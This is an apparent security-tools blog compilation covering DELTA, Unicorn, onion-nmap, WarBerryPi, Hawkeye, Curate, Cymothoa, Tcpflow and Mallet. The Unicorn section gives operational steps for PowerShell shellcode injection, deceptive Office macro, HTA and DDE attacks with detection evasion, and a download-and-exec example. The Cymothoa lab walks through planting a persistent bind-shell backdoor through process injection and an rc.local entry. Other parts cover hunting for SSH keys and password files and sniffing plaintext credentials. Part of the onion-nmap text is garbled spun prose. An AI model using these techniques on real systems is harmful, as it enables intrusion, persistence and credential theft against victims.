Delta – SDN Security Evaluation & Penetration Testing Framework

DELTA is a penetration testing framework that regenerates known attack scenarios for diverse test cases. This framework also provides the capability of discovering unknown security problems in SDN by employing a fuzzing technique.

Agent-Manager is the control tower. It takes full control over all the agents deployed to the target SDN network.
Application-Agent is a legitimate SDN application that conducts attack procedures and is controller-dependent. The known malicious functions are implemented as application-agent functions.
Channel-Agent is deployed between the controller and the OpenFlow-enabled switch. The agent sniffs and modifies the unencrypted control messages. It is controller-independent.
Host-Agent behaves as if it was a legitimate host participating in the target SDN network. The agent demonstrates an attack in which a host attempts to compromise the control plane.

Also Read whatweb – Tool to Discover Security Vulnerabilities With Your Web Application

Installing DELTA

Its installation depends on maven and ant build system. The mvn command is used to install the agent-manager and the agents. It can support an All-In-One Single Machine environment via containers as well as a real hardware SDN environment.

STEP 1. Get the source code of DELTA on the agent manager machine

$ git clone https://github.com/OpenNetworkingFoundation/DELTA.git

STEP 2. Install DELTA dependencies

$ cd <DELTA>/tools/dev/delta-setup/
$ ./delta-setup-devenv-ubuntu

STEP 3. Install three containers using lxc

$ source ./<DELTA>/tools/dev/delta-setup/bash_profile
$ cd <DELTA>/tools/dev/lxc-setup
$ ./lxc-create

$ sudo vi /etc/default/lxc-net
Uncomment "LXC_DHCP_CONFILE=/etc/lxc/dnsmasq.conf"
$ sudo service lxc-net restart
$ sudo lxc-start -n container-cp -d

$ sudo vi /etc/apparmor.d/abstractions/lxc/container-base
Uncomment "mount options=(rw, make-rprivate) -> **,"
$ sudo apparmor_parser -r /etc/apparmor.d/lxc-containers

$ cd ~
$ ssh-keygen -t rsa
(Press Enter)
$ ssh-copy-id -i ~/.ssh/id_rsa.pub $DELTA_CP
(ID: ubuntu, PW: ubuntu)

$ ssh $DELTA_CP
(DELTA_CP) $ sudo visudo
In the bottom of the file, type the follow:
ubuntu ALL=(ALL) NOPASSWD: ALL
(DELTA_CP) $ exit

$ cd <DELTA>/tools/dev/lxc-setup
$ ./lxc-setup
$ ssh-copy-id -i ~/.ssh/id_rsa.pub $DELTA_CH
$ ssh-copy-id -i ~/.ssh/id_rsa.pub $DELTA_DP

In the case of all-in-one single machine, the test environment is automatically setup as below:

Running DELTA

STEP 1. Distribute the executable files to Containers

$ cd <DELTA>
$ source ./tools/dev/delta-setup/bash_profile
$ ./tools/dev/delta-setup/delta-agents-scp

STEP 2. Execute Agent-Manager first

$ cd <DELTA>
$ bin/run-delta tools/config/<configuration file> # e.g., manager_vm.cfg

 DELTA: A Penetration Testing Framework for Software-Defined Networks

 [pP]	- Show all known attacks
 [cC]	- Show configuration info
 [kK]	- Replaying known attack(s)
 [uU]	- Finding an unknown attack
 [qQ]	- Quit

Command>_

STEP 3. Connect Web-based UI (port number is 7070)

Main Contributors

Seungsoo Lee (KAIST)
Jinwoo Kim (KAIST)
Seungwon Woo (KAIST)
Changhoon Yoon (KAIST)
Sandra Scott-Hayward (Queen’s University Belfast)
Seungwon Shin (KAIST)

Unicorn – Downgrade Attack & Inject Shellcode Straight into Memory

A unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed if using Metasploit methods and in the right path) and the magic unicorn will automatically generate a PowerShell command that you need to simply cut and paste the Powershell code into a command line window or through a payload delivery system. Unicorn supports your own shellcode, cobalt strike, and Metasploit.

Also Read Onion nmap To Scan Hidden Onion Services

POWERSHELL ATTACK INSTRUCTIONS

Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the PowerShell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc..

There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the PowerShell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the PowerShell code will download the payload and execute.

Note: You will need to have a listener enabled in order to capture the attack.

MACRO ATTACK INSTRUCTIONS

For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a developer tab. Create a new macro, call it Auto_Open and paste the generated code into that. This will automatically run.

Note that a message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim into thinking the excel document is corrupted. You should get a shell through PowerShell injection after that.

If you are deploying this against Office365/2016+ versions of Word you need to modify the first line of the output from Sub Auto_Open()

To: Sub AutoOpen()

The name of the macro itself must also be “AutoOpen” instead of the legacy “Auto_Open” naming scheme.

NOTE: When copying and pasting the excel, if there are additional spaces that are added you need to remove these after each of the PowerShell code sections under variable “x” or a syntax error will happen!

HTA ATTACK INSTRUCTIONS

The HTA attack will automatically generate two files, the first the index.html which tells the browser to use Launcher.hta which contains the malicious PowerShell injection code. All files are exported to the hta_access/ folder and there will be three main files. The first is index.html, second Launcher.hta and the last, the unicorn.rc file. You can run msfconsole -r unicorn.rc to launch the listener for Metasploit.

A user must click allow and accept when using the HTA attack in order for the PowerShell injection to work properly.

CERUTIL Attack Instruction

The certutil attack vector was identified by Matthew Graeber which allows you to take a binary file, move it into a base64 format and use certutil on the victim machine to convert it back to a binary for you. This should work on virtually any system and allow you to transfer a binary to the victim machine through a fake certificate file. To use this attack, simply place an executable in the path of the unicorn and run python unicorn.py <exe_name> crt in order to get the base64 output. Once that’s finished, go to decode_attack/ folder which contains the files. The bat file is a command that can be run in a windows machine to convert it back to a binary.

Custom PS1 Attack Instructions

This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.

Note: If choosing the macro option, a large ps1 file may exceed the amount of carriage returns allowed by VBA. You may change the number of characters in each VBA string by passing an integer as a parameter.

Examples:

python unicorn.py harmless.ps1 python unicorn.py myfile.ps1 macro python unicorn.py muahahaha.ps1 macro 500

The last one will use a 500 character string instead of the default 380, resulting in less carriage returns in VBA.

DDE Office COM Attack Instructions

This attack vector will generate the DDEAUTO formulate to place into Word or Excel. The COM object DDEInitilize and DDEExecute allow for formulas to be created directly within Office which causes the ability to gain remote code execution without the need of macros. This attack was documented and full instructions can be found at:

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

In order to use this attack, run the following examples:

python unicorn.py dde python unicorn.py windows/meterpreter/reverse_https 192.168.5.5 443 dde

Once generated, a powershell_attack.txt will be generated which contains the Office code, and the unicorn.rc file which is the listener component which can be called by msfconsole -r unicorn.rc to handle the listener for the payload. In addition, a download.ps1 will be exported as well (explained in the latter section).

In order to apply the payload, as an example:

Open Word
Insert tab -> Quick Parts -> Field
Choose = (Formula) and click ok.
Once the field is inserted, you should now see “!Unexpected End of Formula”
Right-click the Field, choose “Toggle Field Codes”
Paste in the code from Unicorn
Save the Word document.

Once the office document is opened, you should receive a shell through PowerShell injection. Note that DDE is limited on char size and we need to use Invoke-Expression (IEX) as the method to download.

The DDE attack will attempt to download download.ps1 which is our PowerShell injection attack since we are limited to size restrictions. You will need to move the download.ps1 to a location that is accessible by the victim machine. This means that you need to host the download.ps1 in an Apache2 directory that it has access to.

You may notice that some of the commands use “{ QUOTE” these are ways of masking specific commands which is documented here.

In this case, we are changing WindowsPowerShell, powershell.exe, and IEX to avoid detection. Also, check out the URL as it has some great methods for not calling DDE at all.

Import Cobalt Strike Beacon

This method will import direct Cobalt Strike Beacon shellcode directly from Cobalt Strike. Within Cobalt Strike, export the Cobalt Strike “CS” (C#) export and save it to a file. For example, call the file, cobalt_strike_file.cs.

The export code will look something like this:

length: 836 bytes */ byte[] buf = new byte[836] { 0xfc, etc

Next, for usage:

python unicorn.py cobalt_strike_file.cs cs

The cs argument tells Unicorn that you want to use the Cobalt strike functionality. The rest is Magic. Next simply copy the PowerShell command to something you have the ability for remote command execution.

NOTE: The file must be exported in the c# (cs) format within cobalt strike to parse properly.

There are some caveats with this attack. Note that the payload size will be a little over 14k+ in byte size. That means that from a command line argument perspective if you copy and paste you will hit the 8191 character size restriction (hardcoded into cmd.exe). If you are launching directly from cmd.exe this is an issue, however, if you are launching directly from PowerShell or other normal applications this is a non-problem.

A couple examples here, wscript.shell and PowerShell use USHORT – 65535 / 2 = 32767 size limit:

typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING;

For this attack, if you are launching directly from PowerShell, VBScript (WSCRIPT.SHELL), there is no issues.

Custom Shellcode Generation Method

This method will allow you to insert your own shellcode into the Unicorn attack. The PowerShell code will increase the stack side of the powershell.exe (through VirtualAlloc) and inject it into memory.

Note that in order for this to work, the txt file that you point Unicorn to must be formatted in the following format or it will not work:

0x00,0x00,0x00 and so on.

Also, note that there are size restrictions. The total length size of the PowerShell command cannot exceed the size of 8191. This is the max command line argument size limit in Windows.

Usage:

python uniocrn.py shellcode_formatted_properly.txt shellcode

Next simply copy the PowerShell command to something you have the ability for remote command execution.

NOTE: The file must properly be formatted in a 0x00,0x00,0x00 type format with nothing else other than your shellcode in the txt file.

There are some caveats with this attack. Note that if your payload size is large in nature it will not fit in cmd.exe. That means that from a command line argument perspective if you copy and paste you will hit the 8191 character size restriction (hardcoded into cmd.exe). If you are launching directly from cmd.exe this is an issue, however, if you are launching directly from PowerShell or other normal applications this is a non-problem.

A couple examples here, wscript.shell and PowerShell use USHORT – 65535 / 2 = 32767 size limit:

typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING;

For this attack, if you are launching directly from PowerShell, VBSCript (WSCRIPT.SHELL), there is no issues.

Onion nmap To Scan Hidden Onion Services

Utilize nmap to scan hidden “onion” benefits on the Tor network. Insignificant picture in view of elevated, utilizing proxychains to wrap nmap. Tor and dnsmasq are keep running as daemons by means of s6, and proxychains wraps nmap to utilize the Tor SOCKS intermediary on port 9050.

Tor is likewise designed through DNSPort to secretly resolve DNS solicitations to port 9053. dnsmasq is arranged to with this localhost:9053 as an expert DNS server. Proxychains is arranged to intermediary DNS through the nearby resolver, so all DNS solicitations will experience Tor and applications can resolve .onion addresses.

Also Read CloudFrunt Tool For Identifying Misconfigured CloudFront Domains

How Onion nmap works:

When the container boots, it launches Tor and dnsmasq as daemons. The tor_wait script then waits for the Tor SOCKS proxy to be up before executing your command.

Arguments:

By default, args to docker run are passed to /bin/nmap which calls nmap with args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com).

For example, this:

docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion

will be executed as:

proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion

In addition to the custom script for nmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or nc as the first argument to docker run. For example:

docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion

will be executed as:

proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion

and

docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion

will be executed as:

proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion

If you want to call any other command, including the original /usr/bin/nmap or /usr/bin/nc or /usr/bin/curl you can specify it as the first argument to docker run, e.g.:

docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion

Environment variables:

There is only one environment variable: DEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted to connections to Tor while waiting for it to boot). Example:

$ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
[tor_wait] Wait for Tor to boot... (might take a while)
[tor_wait retry 0] Check socket is open on localhost:9050...
[tor_wait retry 0] Socket OPEN on localhost:9050
[tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )...
[tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 1] Check socket is open on localhost:9050...
[tor_wait retry 1] Socket OPEN on localhost:9050
[tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )...
[tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 2] Check socket is open on localhost:9050...
[tor_wait retry 2] Socket OPEN on localhost:9050
[tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )...
[tor_wait retry 2] SOCKS proxy UP on localhost:9050
[tor_wait] Done. Tor booted.
[nmap onion] nmap -p 80,443 facebookcorewwwi.onion
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC
[proxychains] Dynamic chain  ...  127.0.0.1:9050  ...  facebookcorewwwi.onion:443  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:9050  ...  facebookcorewwwi.onion:80  ...  OK
Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
Host is up (2.8s latency).

PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds

Notes:

No UDP available over Tor
Tor can take 10-20 seconds to boot. If this is untenable, another option is to run the proxy in its own container, or run it as the main process and then run “exec” to call commands like nmap

WarBerryPi – A Collection Of Scanning Tools For Tactical Exploitation

WarBerryPi was built to be used as a hardware implant during red teaming scenarios where we want to obtain as much information as possible in a short period of time with being as stealth as possible. Just find a network port and plug it in. The scripts have been designed in a way that the approach is targeted to avoid noise in the network that could lead to detection and to be as efficient as possible. The WarBerry script is a collection of scanning tools put together to provide that functionality.

Also Read Hawkeye – A Tool To Crawl The Filesystem Or A Directory

WarBerryPi Usage

To get a list of all options and switches use:

python warberry.py -h


Options:

  --version                             show program's version number and exit
  -h, --help                            show this help message and exit
  -p PACKETS, --packets=PACKETS         Number of Network Packets to capture
  -I IFACE, --interface=IFACE           Network Interface to use. Default: eth0
  -N NAME, --name=NAME                  Hostname to use. Default: Auto
  -i INTENSITY, --intensity=INTENSITY   Port scan intensity. Default: T4
  -Q, --quick                           Scan using threats. Default: Off
  -P, --poison                          Turn Poisoning on/off. Default: On
  -H, --hostname                        Do not Change WarBerry hostname Default: Off
  -e, --enumeration                     Disable Enumeration mode. Default: Off
  -M, --malicious                       Enable Malicious only mode. Default: Off
  -B, --bluetooth                       Enable Bluetooth scanning. Default: Off
  -r, --recon                           Enable Recon only mode. Default: Off
  -W, --wifi                            Enable WiFi scanning. Default: Off
  -S, --sniffer                         Enable Sniffer only mode. Default: Off
  -C, --clear                           Clear previous output folders in ../Results
  -m, --man                             Print WarBerry man pages


example usage: sudo python warberry.py -a -T                Attack all TCP Ports
               sudo python warberry.py -r                   Use only the recon modules
               sudo python warberry.py -H -I wlan0          Use the wlan0 interface and dont change hostname
               sudo python warberry.py -I eth0 -i -T3       Use the eth0 interface and T3 scanning intensity
               sudo python warberry.py -I eth0 -N HackerPC  Use the eth0 interface and change hostname to HackerPC

Installation

Run sudo bash setup.sh

Reporting

Download the /RESULTS folder into /var/www, /Library/Webserver/Documents/ or XAMPP web directory depending on your OS and setup.

Download the warberry.db file locally and save it into Reporting/ .

Change file Config.php under Reporting/WarberryReporting/SQLiteConnection/php to use the correct path of warberry.db

Run index.html under Reporting/

Disclaimer

This tool is only for academic purposes and testing under controlled environments. Do not use without obtaining proper authorization from the network owner of the network under testing. The author bears no responsibility for any misuse of the tool.

Hawkeye – A Tool To Crawl The Filesystem Or A Directory

HawkEye is a simple tool to crawl the filesystem or a directory looking for interesting stuff like SSH Keys, Log Files, Sqlite Database, password files, etc. Hawkeye uses a fast filesystem crawler to look through files recursively and then sends them for analysis in real time and presents the data in both json format and simple console output. The tool is built with a modular approach making it easy to use and easily extensible.

It can be used during pentests as a privilege escalation tool to look through the filesystem finding configuration files or ssh keys sometimes left by the sys-admins.

Features

Simple and modular code base making it easy to contribute.
Fast And Powerful Directory crawling module doing real-time analysis
Easily extensible and vast scanner (Thanks to Gitrob)
Outputs in various formats

Also Read Maintaining Access to a Linux Machine Using Cymothoa – Post Exploitation

Installation Instructions

The installation is easy. Git clone the repo and run go build.

go get github.com/Ice3man543/hawkeye

Upgrading

If you wish to upgrade the package you can use:

go get -u github.com/Ice3man543/hawkeye

Hawkeye Usage

Hawkeye needs a directory to begin with. A directory can be supplied with -d flag. For example –

./hawkeye -d <directory>

To run it against my home directory, i can pass /home/ice3man as the argument.

./hawkeye -d /home/ice3man

 ✘ ice3man@TheDaemon  ~/tmp  ./hawkeye -d /home/ice3man  

 _  _                _    ___           
| || | __ _ __ __ __| |__| __|_  _  ___ 
| __ |/ _  |\ V  V /| / /| _|| || |/ -_)
|_||_|\__,_| \_/\_/ |_\_\|___|\_, |\___|
                              |__/     
	    Analysis v1.0 - by @Ice3man

[13:31:59] HawkEye : An advance filesystem analysis tool
[13:31:59] Written By : @Ice3man
[13:31:59] Github : https://github.com/Ice3man543


[Log file] /home/ice3man/.tplmap/tplmap.log
[Log file] /home/ice3man/burpsuite-master/hs_err_pid3028.log
[Log file] /home/ice3man/.log/jack/jackdbus.log
[Shell command history file] /home/ice3man/oldvps/root/.bash_history
[Shell configuration file] /home/ice3man/oldvps/root/.bashrc

You can use -v flag to show verbose output. You can also get json output using -o flag.

[
    {
        "path": "/home/ice3man/oldvps/root/.bash_history",
        "description": "Shell command history file",
        "comment": ""
    },
    {
        "path": "/home/ice3man/oldvps/root/.profile",
        "description": "Shell profile configuration file",
        "comment": "Shell configuration files can contain passwords, API keys, hostnames and other goodies"
    },
    {
        "path": "/home/ice3man/oldvps/root/.bashrc",
        "description": "Shell configuration file",
        "comment": "Shell configuration files can contain passwords, API keys, hostnames and other goodies"
    },
]

Curate – A tool for fetching archived URLs

Curate is a tool for fetching archived URLs and to be rewritten in Go.

Curate Initial set-up one-liner

This will clone this repository and then move all scripts to /usr/local/bin.

$ git clone git@github.com:EdOverflow/curate.git \
&& cp curate/curate /usr/local/bin/ \
&& echo "You can delete the ./curate/ folder now."

Once you have are done with this one-liner, make sure to include your VirusTotal API key in your .bashrc file. The variable should be named VIRUS_TOTAL_API_KEY.

Also Read Maintaining Access to a Linux Machine Using Cymothoa – Post Exploitation

Usage

To fetch archived URLs simply run it and specify the target host.

 $ curate <host>
 $ curate example.com

If you want to search for strings straight away in the output you can also specify your search term or regular expression by using the -r flag.

$ curate <host> -r <search term>
$ curate example.com -r example

List of search terms

Curate outputs the results into a curate.txt file which allows you to easily grep through the URLs for keywords. Here are some ideas for things to grep for in curate.txt.

admin
password
key
api
hmac
url
path
redir
php
id=

It is advisable to exclude images and stylesheets from your searches by piping everything into ‘grep -v’.

Disclaimer

This project is made for educational and ethical testing purposes
only. Usage of this tool for attacking targets without prior mutual
consent is illegal. Developers assume no liability and are not
responsible for any misuse or damage caused by these scripts.

Maintaining Access to a Linux Machine Using Cymothoa – Post Exploitation

Cymothoa is a post-exploitation tool. It can be used to maintain access to an exploited system. Cymothoa injects a variety of shellcodes to running processes in a system. Almost all nix systems most of the Linux variants can be backdoored with cymothoa.

Cymothoa uses ptrace library in nix systems to evaluate running processes & inject shellcodes. The greatest advantage of this tool is that we need not create a separate process for the backdoor. While a process is running itself, we can infect a process and start a backdoor. Say for example, if we exploited a web server, hell sure apache2 or httpd or nginx or whatever the web server program is, will be turned on during boot. So we try to inject cymothoa to such service daemons & automate its start during boot. Let’s see it in action, but first, learn a bit about cymothoa

Homepage: http://cymothoa.sourceforge.net/

Options

Syntax: cymothoa -p <pid> -s <shellcode_number> [options]

Main options:
	-p	process pid
	-s	shellcode number
	-l	memory region name for shellcode injection (default /lib/ld)
	  	search for "r-xp" permissions, see /proc/pid/maps...
	-m	memory region name for persistent memory (default /lib/ld)
	  	search for "rw-p" permissions, see /proc/pid/maps...
	-h	print this help screen
	-S	list available shellcodes

Injection options (overwrite payload flags):
	-f	fork parent process
	-F	don't fork parent process
	-b	create payload thread (probably you need also -F)
	-B	don't create payload thread
	-w	pass persistent memory address
	-W	don't pass persistent memory address
	-a	use alarm scheduler
	-A	don't use alarm scheduler
	-t	use setitimer scheduler
	-T	don't use setitimer scheduler

Payload arguments:
	-j	set timer (seconds)
	-k	set timer (microseconds)
	-x	set the IP
	-y	set the port number
	-r	set the port number 2
	-z	set the username (4 bytes)
	-o	set the password (8 bytes)
	-c	set the script code (ex: "#!/bin/sh\nls; exit 0")
	  	escape codes will not be interpreted...
Payloads

0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com)
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via upd

Lab: Inject Backdoor into a Compromised Linux System

Scenario: We have an attacker system running Kali linux with IP 192.168.0.103, a target Linux system(metasploitable 2.0) with IP 192.168.0.102. The story continues after the victim is exploited. I have already got a meterpreter shell connected to the victim.

I will explain in brief the procedure for this. Take a look at the following figure.

Yes, that is the algorithm. I want you to understand the procedure rather than just copying the steps. We first exploit the system gain access to it. Then the rest is all about Maintaining access.

Then we can try uploading the existing cymothoa binary(/usr/bin/cymothoa or /usr/share/cymothoa) to the target & try executing it. But it failed for me all the time. So if it does, proceed to step 3 below. If it doesn’t, don’t worry, we have access to the system, we will download a new copy & install it.

After installation, try executing it. If the cymothoa banner comes, then the installation is successful. After this, we try infecting a running process & see if we can get a connection. Mostly this will succeed. If it doesn’t just try it with another process. But the problem with this is it only lasts for the present & not for the future.

Meaning, if the process dies or the system is rebooted, we won’t get the backdoor running. For this, we create a shell script and edit some boot time configurations in the victim & make a process infected each time the system starts or reboots. Thus we can have a persistent backdoor.

Enough Talk, Lets Attack!

Step 1: Download Cymothoa & Upload it to Victim

Download the latest version from the link below using the web browser in Kali Linux attacker machine.

Download Link: http://sourceforge.net/projects/cymothoa/files/cymothoa-1-alpha/

The default location is /root/Downloads. Remember this.

Now I have a meterpreter session running(How to gain access in Exploitation section.). Upload the downloaded archive to the victim. Optionally you can also download it directly to the victim (if you know).

meterpreter > upload Downloads/cymothoa<press tab> <space> /root/
meterpreter > shell
command: tar -xvf cymothoa< Enter full name here, Pressing tab key Doesen't work>

Note: Every time you drop into a shell from meterpreter, the shell has limited capabilities. Tab key doesn’t work & vim doesn’t return a display. It crashes if we open something in vim or nano.

Step 2: Install Cymothoa & Execute.

While we are in the shell. Change directory to the location we uploaded the archive and give execute permissions. Then execute the “Makefile”.

command cd <location> 
command: chmod +x cymothoa<full name> -R 
command: ./Makefile

Now try to execute the file. Remember to be in the directory where you uploaded the archive.

Command: ./cymothoa

Step 3: Infect a running process.

Now find the processes running in the system & note the process id (pid).

command: ps -e

Now, infect the process with cymothoa.

syntax: ./cymothoa -p <pid> -s <shellcode number> -y <listening port>

command: ./cymothoa -p 5476 -s 1 -y 100

Tip: Remember to check whether the listening port(-y option) is already in use.

Now check if the port is open

command: netstat -l | grep 100<your port here>

Step 4: Try a netcat connection from the attacker machine.

Open up a new terminal in Kali Linux attacker system & initiate a netcat connection to the port we specified

command: nc 192.168.0.102 100 <give your victim ip & port>

There you have…!

Step 5: Prepare script, upload it & set up execution.

This is the hard part. If you have any idea about shell scripting you can understand. Or else try to learn some. Anyway, the script is very simple. It first extracts the pid of a service or a daemon. Checks if it is a number or not.

Sometimes a process will have child processes. So there will be more than one pids available. In that case it is essential to extract one pid alone from a list of pids. Then the script assigns the pid to a variable (say q here). Then executes cymothoa with value of the variable q as the value for the “-p” option. Here is the script.

#!/bin/bash
p=`cat /var/run/crond.pid`
#extracts the pid. Here replace the last with a process of your desire.
#example: p=`cat /var/run/apache2.pid`.
#Remember the chracter before cat & after pid is a backtick & not an inverted comma.
if [ "$p" -eq "$p" ] 2>/dev/null; then #checks whether it's a number or not.
q=$p
else
q=`(echo $p | awk '{print $2}')` #takes the next row which will be a number. Here also it's a backtick
fi
echo $q
exec /cymothoa-1-alpha/cymothoa -p $q -s 1 -y 100 # make sure to give absolute path of cymothoa in the victim.
exit

Things to note:

When assigning the output of a command to a variable, a backtick is used.
Always give absolute & full paths whenever needed.
You can choose any service. A service which is likely to start at boot like apache2/crond/vsftpd/mysqld etc is appropriate.
Pid location is standard unix systems is ” /var/run/process.pid “.
Make sure the listening port(-y option) will be unused by other services. Giving port 80 will be a bad idea if it’s a web server.

Copy the script to a file in the kali linux machine. Edit it accordingly and save it.

Drop back to meterpreter shell by pressing Cntrl+c & upload the script to /etc/init.d

meterpreter> upload cym.sh /etc/init.d/ <replace cym.sh by your filename>

Drop to the shell again by giving shell command & change permissions.

meterpreter> shell 
chmod +x /etc/init.d/cym.sh <replace by your file>

Now is the big part. We have to enable the script to run during boot time. this is simple, just add an entry to /etc/rc.local. But vim or nano will not be available.

Also if we cat the file(rc.local) there is a statement “exit 0” at the end. Any statements appended after this will not be executed. So we have to cut the last line, append our new line & then append the old exit line.

command: sed -i '$d' /etc/rc.local 
command: echo "sh /etc/init.d/cym.sh" >> /etc/rc.local 
command: echo "exit 0" >> /etc/rc.local

Ensure it by

command: tail /etc/rc.local

Note: Here also give absolute paths when writing it to the rc.local file.

All SET..!

Now while in the shell, issue

command: /etc/init.d/rc.local start

If every step were right, you got it. Then try netstat while within the shell & see if the port is listening. If you are permitted, reboot the machine so that the shell & meterpreter session dies. Open a netcat to the victim after some time. You will be amazed.

Phew ! That was long but you will get very good results. I had to do a lot of research for each steps in the process & would definitely like your feedback. Try this out & please subscribe, comment & follow this blog everywhere.

References:

https://nixos.org/nix/

http://www.cyberciti.biz/faq/unix-linux-bsd-appleosx-bash-assign-variable-command-output/

http://beginlinux.com/server/ubuntu/how-to-run-scripts-at-ubuntu-startup

http://scx020c07c.blogspot.in/2012/09/backdooring-using-cymothoa.html

http://stackoverflow.com/questions/806906/how-do-i-test-if-a-variable-is-a-number-in-bash

Tcpflow – To Monitor, Capture & Dump Packets

Tcpflow is a TCP/IP Demultiplexer. Tcpflow is used to record traffic mainly between 2 hosts although it can be used to monitor thousands of connections. Tcpflow differs from other tools by actually capturing the real data and dumping it to a file we specify.

It can be then further used for other analysis purposes. One more advantage of tcpflow is it effectively reconstructs broken packets. Also, tcpflow has a variety of filter options. We can filter out the capture in a lot of different ways and that too very easily.

Normally most of the sniffing attacks include arp-poisoning as the first stage. However, tcpflow captures almost all data without actively poisoning the subnet or network.

Options

Syntax: tcpflow [options] [expression] [host]

-b: max number of bytes per flow to save

-c: console print only (don't create files)

-C: console print only, but without the display of source/dest header

-d: debug level; default is 1

-e: output each flow in alternating colors(Blue=client to server;Red=server to client;Green=Unknown)

-f: maximum number of file descriptors to use

-h: print this help message

-i: network interface on which to listen

-p: don't use promiscuous mode

-r: read packets from tcpdump output file

-s: strip non-printable characters (change to '.')

-v: verbose operation equivalent to -d 10

Source: https://github.com/simsong/tcpflow

Reference: http://forensicswiki.org/wiki/Tcpflow

Lab 1: Basics

This lab demonstrates basic console-logging of data to and from the target. Here our target IP is 192.168.0.100. Also, domain/hostnames are acceptable.

command tcpflow -ce host 192.168.0.100<your target here>

Note: If you are using any other interface make sure to give -i option & the corresponding interface.

Suppose we need all the HTTP traffic in the network,

command: tcpflow -ce port 80

We can use logical comparisons also during capturing. For example, we want to see all the HTTP & https traffic from & to the host, we issue:

Command: tcpflow -ce host 192.168.0.100<your target> and port 80 or port 443.

Here the command selects the host “192.168.0.100”, do an “AND” operation to the condition: port 80 “OR” port 443. Specifically, HTTP or https traffic from & to host(192.168.0.100) is captured and displayed. Remember HTTP runs on port 80 & https on 443.

Lab2: Dump Data to a local folder

This lab demonstrates on dumping the all the data between the target. Tcpflow dumbs all data into the current working folder(execute the command:pwd to know your current present working directory). So let’s create a folder for dumping the data and then execute tcpflow.

Step 1: Create a new directory

Command: mkdir tcpflowdata<your name here>

Step 2: Change to the new directory

Command: cd tcpflowdata<yourname>

Step 3: execute tcpflow

Command: tcpflow host 192.168.0.103<your target here>

You can see all files being dumped into the directory with the host we have given as the beginning of the filename.

The advantage from this tool is that any clear text data like HTTP authentication or telnet connection or smb authentication etc will be visible to you. Once you dump all the traffic, you can view it later and analyze it at a later point in time and whatnot? You can load it to Wireshark or any tool like xplico for forensic analysis etc.

Try for yourself, start tcpflow, and go to any HTTP site(not facebook or twitter) maybe your local router login page. Give password and analyze the tcpflow output.

Don’t forget to Subscribe, Like us on FB, Follow us on Twitter, G+, and comment here.

Mallet – A Framework For Creating Proxies

Mallet is a tool for creating proxies for arbitrary protocols, along similar lines to the familiar intercepting web proxies, just more generic.

It is built upon the Netty framework, and relies heavily on the Netty pipeline concept, which allows the graphical assembly of graphs of handlers. In the Netty world, handler instances provide frame delimitation (i.e. where does a message start and end), protocol decoding and encoding (converting a stream of bytes into Java objects, and back again, or converting a stream of bytes into a different stream of bytes – think compression and decompression), and higher level logic (actually doing something with those objects).

